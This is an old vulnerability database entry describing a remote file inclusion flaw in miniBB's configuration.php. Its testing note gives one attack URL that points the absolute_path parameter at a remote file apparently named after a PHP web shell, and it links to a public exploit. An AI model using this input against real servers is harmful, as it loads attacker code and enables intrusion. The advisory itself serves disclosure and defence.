miniBB configuration.php absolute_path Variable Remote File Inclusion

2007-04-11T20:49:28
ID OSVDB:35762
Type osvdb
Reporter OSVDB
Modified 2007-04-11T20:49:28

Description

Manual Testing Notes

/configuration.php?absolute_path=http://[target]/r57.txt?

References:

Related OSVDB ID: 35761 Mail List Post: http://www.attrition.org/pipermail/vim/2007-April/001518.html ISS X-Force ID: 33578 Generic Exploit URL: http://www.milw0rm.com/exploits/3707 FrSIRT Advisory: ADV-2007-1354 CVE-2007-2317 Bugtraq ID: 23416